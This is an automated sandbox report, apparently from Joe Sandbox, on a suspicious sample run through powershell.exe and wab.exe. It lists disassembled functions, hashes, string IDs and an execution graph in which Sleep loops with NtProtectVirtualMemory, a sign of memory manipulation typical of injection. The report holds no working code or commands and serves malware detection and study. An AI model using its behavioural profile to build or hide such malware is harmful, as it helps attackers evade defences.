                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9bbab950d75b45d9fb61b8ce0cd937d16f8af493c36f60e8dd7df7142fb414c7
                    • Instruction ID: bc641198e7a3efaf933692d38f6ee340ad832d19a9d8cc0b0b335fd01ae57d1c
                    • Opcode Fuzzy Hash: 9bbab950d75b45d9fb61b8ce0cd937d16f8af493c36f60e8dd7df7142fb414c7
                    • Instruction Fuzzy Hash: A2213AB2900205DFCB05DF15DAC0F56BF79FB84325F2485ADE9090B266C33AD456CBA2
                    Function 06FD0BB0 Relevance: 17.9, Strings: 14, Instructions: 410COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q
                    • API String ID: 0-1314254452
                    • Opcode ID: 617b264244312fa77af1c4f2e4555675411d4cc45a790e6ac575c2605f5e8e03
                    • Instruction ID: 5c8690e5c12c477072ba4b9f1e1f74e3baa74937b4e5ab0efd4c8304cd5cfc0f
                    • Opcode Fuzzy Hash: 617b264244312fa77af1c4f2e4555675411d4cc45a790e6ac575c2605f5e8e03
                    • Instruction Fuzzy Hash: 25E18F35F00214DFDB68DFA8C554AAEBBA7EF88310F188465E9059B355CB71EC42CBA1
                    Function 06FD3820 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3118171705
                    • Opcode ID: 727f7ad1329c6f5d05847bb2bb350dc798c314f9318df782c7862cd2547c9cdf
                    • Instruction ID: 250a7796410c2fc85fce7dd4b3b1bb7c0a9f94c4a0f1aaf28197117cd2ab0ca2
                    • Opcode Fuzzy Hash: 727f7ad1329c6f5d05847bb2bb350dc798c314f9318df782c7862cd2547c9cdf
                    • Instruction Fuzzy Hash: 2C514833F083158FDBA94E29C8506267BA7AF82650B1C446ADA45CB259CE32ED45C7E3
                    Function 06FDDED4 Relevance: 9.0, Strings: 7, Instructions: 202COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: fc0162b48518974f671a9c12459e02bc067872f588d3963a72579e85d91329c4
                    • Instruction ID: 73576a724bf6110b07f3befcaa6b07ab4ca8d2dd295a763fe966e7fc1e50c08f
                    • Opcode Fuzzy Hash: fc0162b48518974f671a9c12459e02bc067872f588d3963a72579e85d91329c4
                    • Instruction Fuzzy Hash: 2771BE31E00205DFDB648F58C584BAAB7B3AF89751F5D845AE844AF291CB31ED81CBA1
                    Function 06FDDEE8 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: 83f35ea2ca3ac3f4eec938da18244e106f680071181ea335876bfe4e2938028b
                    • Instruction ID: 72735c5f5208073475fc59eb38ee1ca890b5ecf857b3ab68d9a7a0fab00616ff
                    • Opcode Fuzzy Hash: 83f35ea2ca3ac3f4eec938da18244e106f680071181ea335876bfe4e2938028b
                    • Instruction Fuzzy Hash: 5C619E31E00205EFDB648F58C584BAAB7E3AF88751F5D8459E804AF294CB71E981CBA1
                    Function 06FDDB98 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2778409501
                    • Opcode ID: fd8c2b0b8a77eb5db7c1da8467600ba1d38ff42c5cf2875c369d96d4e6edfa75
                    • Instruction ID: b6898b83764853cc16974706c7c539464dc342ac3f6446b8f600e732a6408607
                    • Opcode Fuzzy Hash: fd8c2b0b8a77eb5db7c1da8467600ba1d38ff42c5cf2875c369d96d4e6edfa75
                    • Instruction Fuzzy Hash: 95519F31E00205DFDFA88E09C544BA6B7B3BF44751F5D84AAE8059B290C7B1FD84CBA1
                    Function 06FD0148 Relevance: 7.8, Strings: 6, Instructions: 285COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Tk$4']q$4']q$4']q$4']q$DUk
                    • API String ID: 0-2132101123
                    • Opcode ID: a7dcc608f2e73e9e3c6ecd5e5e652cc1734d2b7d6e4109875badf59106c7a79b
                    • Instruction ID: 0655f55d928431367be5754607919024f2fdee2347f80d6377820d797576d100
                    • Opcode Fuzzy Hash: a7dcc608f2e73e9e3c6ecd5e5e652cc1734d2b7d6e4109875badf59106c7a79b
                    • Instruction Fuzzy Hash: AF912435F05208CFCBA49F68D444AAABBE7EFC5215F2884AAD405DB215DF31E805C7A2
                    Function 06FDE968 Relevance: 7.7, Strings: 6, Instructions: 220COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                    • API String ID: 0-1061996819
                    • Opcode ID: 0bafa864e13173439a31aaf48ecf069f8adbcb6675b281e4f12d583f9b3c404f
                    • Instruction ID: 533bd7ebb7f1c3d463ee9b4b4a66bdc6dd7def2a9910b7288218e8ad27d7420b
                    • Opcode Fuzzy Hash: 0bafa864e13173439a31aaf48ecf069f8adbcb6675b281e4f12d583f9b3c404f
                    • Instruction Fuzzy Hash: 5271E431F002159FDB659B68C454AAABBF7AF88710F18C469E8069F295CB71FC41CBA1
                    Function 06FD9608 Relevance: 7.6, Strings: 6, Instructions: 132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3723351465
                    • Opcode ID: f9d28e437fe178e82d6a499ccaa3d78e6c7d866c2a5d0a7e0383d9f6b9ac2543
                    • Instruction ID: d145cf3a088db478704293820f74db12fa17d3212705be8a55b315275b54c0b5
                    • Opcode Fuzzy Hash: f9d28e437fe178e82d6a499ccaa3d78e6c7d866c2a5d0a7e0383d9f6b9ac2543
                    • Instruction Fuzzy Hash: 2C414C31F043059FDB655FE9885056BBBF7AF82210B1C84BBC855CB252DA75E405C7D1
                    Function 06FDA418 Relevance: 6.5, Strings: 5, Instructions: 254COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q
                    • API String ID: 0-416004693
                    • Opcode ID: 473a51c1becc64e090bdbd0bcd4f0ffcb6066f5eda31924290b97219c06af765
                    • Instruction ID: 260878a07d80bed19967b4a45a6fa5a3259e9d0f2a87bcdbbae012f2ec224476
                    • Opcode Fuzzy Hash: 473a51c1becc64e090bdbd0bcd4f0ffcb6066f5eda31924290b97219c06af765
                    • Instruction Fuzzy Hash: B4815832F04344CFCB6597ACC41476ABBB3AF83310F1C84AAD445DB262DA35D845C7A6
                    Function 06FDE5A0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2702571027
                    • Opcode ID: 3d020e6efc87ba0355cff47b99a08ae8bb4bd4923baee536b1022e2effe50279
                    • Instruction ID: 05e51f0028927710175b0aff8b38bf7b7d0c8586a889d089deb9c705c8672b73
                    • Opcode Fuzzy Hash: 3d020e6efc87ba0355cff47b99a08ae8bb4bd4923baee536b1022e2effe50279
                    • Instruction Fuzzy Hash: 2A61C131E14209EFEBA88F54C584BAAB7A3EF45751F5C8466E9115F291C731FC80CBA1
                    Function 06FDC743 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: 28437480a2862015dbf132d7fbaff3632b9b01118d5a99d44f9d698474d9ecf7
                    • Instruction ID: c4ebd2150658a326afda65da884cc852c814356417232cac68669c3cc3dfca7b
                    • Opcode Fuzzy Hash: 28437480a2862015dbf132d7fbaff3632b9b01118d5a99d44f9d698474d9ecf7
                    • Instruction Fuzzy Hash: 20515831F08204DFDBA59F38C444AAA7FEBAF80350F18C466D845CB295DB34E945C7A1
                    Function 06FDCB18 Relevance: 6.4, Strings: 5, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: 15e23af51daf168b1ef7455c5d6bf9ade28da038ed6e734d77bf41cb126f56ae
                    • Instruction ID: 650f86e9a9a9bf8c58fe373e75e2411c9f06152f7c8e748c5d17cb4057916955
                    • Opcode Fuzzy Hash: 15e23af51daf168b1ef7455c5d6bf9ade28da038ed6e734d77bf41cb126f56ae
                    • Instruction Fuzzy Hash: CD513731F0424DCFDB698F68C8446AA77BBFF81310F28C566E9658B291D734E845CBA1
                    Function 06FDCD30 Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: d1c117e37dc94a4102e79f772a2e8d371448453287282cc1d091a9df8f7a5d8a
                    • Instruction ID: 7662dd271d7456594e7ea2203e04807b5d76aa6a04cd52471d3672743918e695
                    • Opcode Fuzzy Hash: d1c117e37dc94a4102e79f772a2e8d371448453287282cc1d091a9df8f7a5d8a
                    • Instruction Fuzzy Hash: BB514732F44208DFDBA98F28C8442AA7BBBEF85350F18C566D8558F251DB31E945CBE1
                    Function 06FD3D38 Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: 07f13173192ec3edee601a13398d308e66fca4da3ba6b28f96eb58b41ba20345
                    • Instruction ID: 6154d6c93d4f046e3742dbb769f1f8fffc3cb09ff247e57ce3d439719e3fa7cd
                    • Opcode Fuzzy Hash: 07f13173192ec3edee601a13398d308e66fca4da3ba6b28f96eb58b41ba20345
                    • Instruction Fuzzy Hash: 69514A37F04209CFDB694B28841066AB7E7EF82610B1C8476D641CB291DF36ED05C7A3
                    Function 06FDA740 Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP]q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-1831577214
                    • Opcode ID: 98ef686f9c297ad438e1cbea9fa048e29a56b67f0477813c9ebf55f033c83a64
                    • Instruction ID: 125a68350cbddba3dd1a77430d61078f3e6118047c5e903b73a726a09dcf83d6
                    • Opcode Fuzzy Hash: 98ef686f9c297ad438e1cbea9fa048e29a56b67f0477813c9ebf55f033c83a64
                    • Instruction Fuzzy Hash: 1A412B36B083549FD7598B79C840666BBF6EF85720B2C856BD854CB3A1CA35EC01C3A5
                    Function 06FDD020 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o]q$(o]q$(o]q$(o]q
                    • API String ID: 0-1261621458
                    • Opcode ID: bd4c9f47591e132eeec95e6aacb4f144d2e0ef6a5adcbed92e8211156395c0d1
                    • Instruction ID: 379f95b8afbd4e61e8d59f313938fce068b309b392fac3fa13434f5a18a3dae6
                    • Opcode Fuzzy Hash: bd4c9f47591e132eeec95e6aacb4f144d2e0ef6a5adcbed92e8211156395c0d1
                    • Instruction Fuzzy Hash: 36F14631F04305CFDB659F68D854BAABBB3EF86315F18846AE406CB291DB31E845C7A1
                    Function 06FD7170 Relevance: 5.3, Strings: 4, Instructions: 274COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    • Opcode ID: 762a53724c92a3776a23addddc61072c870c100e0ebc553ca5d228945b0b7fbd
                    • Instruction ID: 68023755ce2d03984e2856f8cacbea2fd31469e4b45907cf90194686924c1118
                    • Opcode Fuzzy Hash: 762a53724c92a3776a23addddc61072c870c100e0ebc553ca5d228945b0b7fbd
                    • Instruction Fuzzy Hash: EB918931F04344DFDB656A6888517AABFA7AF82310F1C84AAD815DF291DB35EC01C7E2
                    Function 06FDC238 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    • Opcode ID: d42396e1d0ac397666528cecbcbb760277b17a3c2d580fd0f738e9c2d1c78754
                    • Instruction ID: 50f9972a55d7e3af94f023b46504dac5b85c3013f2415e62b1cedbdb44b02fc8
                    • Opcode Fuzzy Hash: d42396e1d0ac397666528cecbcbb760277b17a3c2d580fd0f738e9c2d1c78754
                    • Instruction Fuzzy Hash: 84815D32F043048FDB659AAC880167ABBABAFC6220F1C857AD545DB291DF35EC41C7E1
                    Function 06FD04E0 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    • Opcode ID: d5433ac1130a54262d5997bba9eb2f74213d469e6caba9f4492fc556623bab27
                    • Instruction ID: 1236200d36949b5d4e4a50252fb7fb9b5b7907fe4de55b74f76848bead7c6ce0
                    • Opcode Fuzzy Hash: d5433ac1130a54262d5997bba9eb2f74213d469e6caba9f4492fc556623bab27
                    • Instruction Fuzzy Hash: 9981F135F00204AFDB649F68C554BAABBE3EF85310F18C569E8459F291CF35E885CBA1
                    Function 06FD23A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q
                    • API String ID: 0-858218434
                    • Opcode ID: bf1663be65a220d2a91b85f76d57f8c2171b856796e13ccc5021d1ad610dfc89
                    • Instruction ID: 5e2ddd62b5ca7ab50230561272e9fb86c94eb364f10116a85316515bc3c98967
                    • Opcode Fuzzy Hash: bf1663be65a220d2a91b85f76d57f8c2171b856796e13ccc5021d1ad610dfc89
                    • Instruction Fuzzy Hash: F9213732B103119BDBA8196E8841B277ADBBBC1715F28842AEE46C7382CD36D901C3F1
                    Function 06FD130B Relevance: 5.0, Strings: 4, Instructions: 32COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q
                    • API String ID: 0-978391646
                    • Opcode ID: 21784d5d093b7542c419bc6d3ec7302d6e3b4159bc149ad7d16f3fa693bf9fae
                    • Instruction ID: 2f5311fd062aacfe9a418a06bc8ce5c17d1a92136c407fad4c8e6d2492c2ac80
                    • Opcode Fuzzy Hash: 21784d5d093b7542c419bc6d3ec7302d6e3b4159bc149ad7d16f3fa693bf9fae
                    • Instruction Fuzzy Hash: 6DF02B32F042498BDA7D96AD246212975E79FC0D5072D482BC442DB748CE259C4287DB

                    Execution Graph

                    Execution Coverage:0%
                    Dynamic/Decrypted Code Coverage:20%
                    Signature Coverage:100%
                    Total number of Nodes:5
                    Total number of Limit Nodes:0
                    execution_graph 75644 42952a1 75647 42952e3 75644->75647 75645 429530d NtProtectVirtualMemory 75645->75647 75646 4295302 Sleep 75646->75644 75647->75644 75647->75645 75647->75646 75649 213b2c70 LdrInitializeThunk

                    Executed Functions

                    Function 042952A1 Relevance: 3.1, APIs: 2, Instructions: 53sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • Sleep.KERNELBASE(00000005), ref: 04295304
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, Offset: 041A8000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_41a8000_wab.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 475730435105d35968d2c1883a42312f8c816ac8f32dd279802f53ad13863b40
                    • Instruction ID: 40f600c419aaa82ac935169e71d391428162e3c995585bc27a8bd47849cf2f9b
                    • Opcode Fuzzy Hash: 475730435105d35968d2c1883a42312f8c816ac8f32dd279802f53ad13863b40
                    • Instruction Fuzzy Hash: FE1101B2B50342AFEB055E32C94CB4677A4AF003A5F4A8298E9515B0E2D7B4D880CE11
                    Function 213B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 11 213b2df0-213b2dfc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b29bc889a562c71d9a79540186bce7419f229094bd3998a476618352ab254b9f
                    • Instruction ID: a9bc4620d26433fd31eaf98c53039ad4ebb174de7cfb1d2361cb4a057ac400fe
                    • Opcode Fuzzy Hash: b29bc889a562c71d9a79540186bce7419f229094bd3998a476618352ab254b9f
                    • Instruction Fuzzy Hash: EB90023920140413E111715D4544707100A57D0645F95C462A0424518DD6578F56A221
                    Function 213B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 10 213b2c70-213b2c7c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f93d2a3930090a86cc39aedcd8b07cef8ac77243d0957f9e6944393c90479852
                    • Instruction ID: b2b52934123272c28542ae3bf08170599eb234158bdafb3a9927890b5bde4834
                    • Opcode Fuzzy Hash: f93d2a3930090a86cc39aedcd8b07cef8ac77243d0957f9e6944393c90479852
                    • Instruction Fuzzy Hash: 5D90023920148802E110715D844474A100657D0705F59C461A4424618DC6968E957221
                    Function 213B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 12 213b35c0-213b35cc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 58831eff0ff698a1c861da52c87e6ec04c80bfb11429334310868c1be36102b6
                    • Instruction ID: 9e15d097f26a686d95dfa53a52740b32c0a4b8bba2351c78025bff059a2360aa
                    • Opcode Fuzzy Hash: 58831eff0ff698a1c861da52c87e6ec04c80bfb11429334310868c1be36102b6
                    • Instruction Fuzzy Hash: 7190023960550402E100715D4554706200657D0605F65C461A0424528DC7968F5566A2

                    Non-executed Functions

                    Function 21428D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 13 21428d10-21428d27 call 213c7e54 GetPEB 16 21428d29-21428d2c 13->16 17 21428d2e 13->17 18 21428d33-21428d41 GetPEB 16->18 17->18 19 21428d43-21428d51 18->19 20 21428d57-21428d64 18->20 19->20 21 21429000-21429002 19->21 22 21428d6a-21428d70 20->22 23 21428f3b-21428f5b call 213ff290 20->23 27 21429005-2142900f 21->27 24 21428d76-21428d7c 22->24 25 21428ec4-21428f0f call 213ff290 * 3 22->25 37 21428f62-21428f7a call 213ff290 23->37 38 21428f5d 23->38 30 21428d7e-21428d88 24->30 31 21428ddd-21428de5 24->31 82 21428f11-21428f16 25->82 83 21428f34-21428f39 25->83 28 21429011-2142901d call 213fa960 27->28 29 2142901f-2142903a 27->29 28->29 35 21428da3-21428dd8 call 213ff290 * 3 30->35 36 21428d8a-21428d9e call 213ff290 30->36 40 21428deb-21428df5 31->40 41 21428ebc-21428ebf 31->41 72 21428f95-21428f9c call 213ff290 35->72 45 21428f9f-21428fb8 call 213ff290 36->45 60 21428f90 37->60 61 21428f7c-21428f8e call 213ff290 37->61 38->37 48 21428e46-21428e64 call 213ff290 40->48 49 21428df7-21428dfb 40->49 41->45 65 21428fba-21428fc9 call 213ff290 45->65 66 21428fcc-21428fe4 call 213ff290 45->66 69 21428e86 48->69 70 21428e66-21428e84 call 213ff290 * 2 48->70 49->48 56 21428dfd-21428e1f call 213ff290 49->56 74 21428e21-21428e29 56->74 75 21428e2b 56->75 60->72 61->45 65->66 66->27 98 21428fe6-21428ffe call 213ff290 66->98 76 21428e8b-21428e92 call 213ff290 69->76 102 21428e95-21428e9c 70->102 72->45 85 21428e33-21428e3d call 213ff290 74->85 87 21428e3f-21428e44 75->87 88 21428e2d-21428e2e 75->88 76->102 93 21428f18-21428f1d 82->93 94 21428f2d-21428f32 82->94 83->72 85->102 87->76 88->85 93->94 95 21428f1f-21428f24 93->95 94->72 95->45 101 21428f26-21428f2b 95->101 98->27 101->72 102->45
                    Strings
                    • The resource is owned shared by %d threads, xrefs: 21428E2E
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 21428E3F
                    • write to, xrefs: 21428F56
                    • This failed because of error %Ix., xrefs: 21428EF6
                    • The critical section is owned by thread %p., xrefs: 21428E69
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 21428FEF
                    • a NULL pointer, xrefs: 21428F90
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 21428D8C
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 21428E02
                    • <unknown>, xrefs: 21428D2E, 21428D81, 21428E00, 21428E49, 21428EC7, 21428F3E
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 21428E86
                    • an invalid address, %p, xrefs: 21428F7F
                    • The instruction at %p referenced memory at %p., xrefs: 21428EE2
                    • *** then kb to get the faulting stack, xrefs: 21428FCC
                    • The resource is owned exclusively by thread %p, xrefs: 21428E24
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 21428F26
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 21428F2D
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 21428DB5
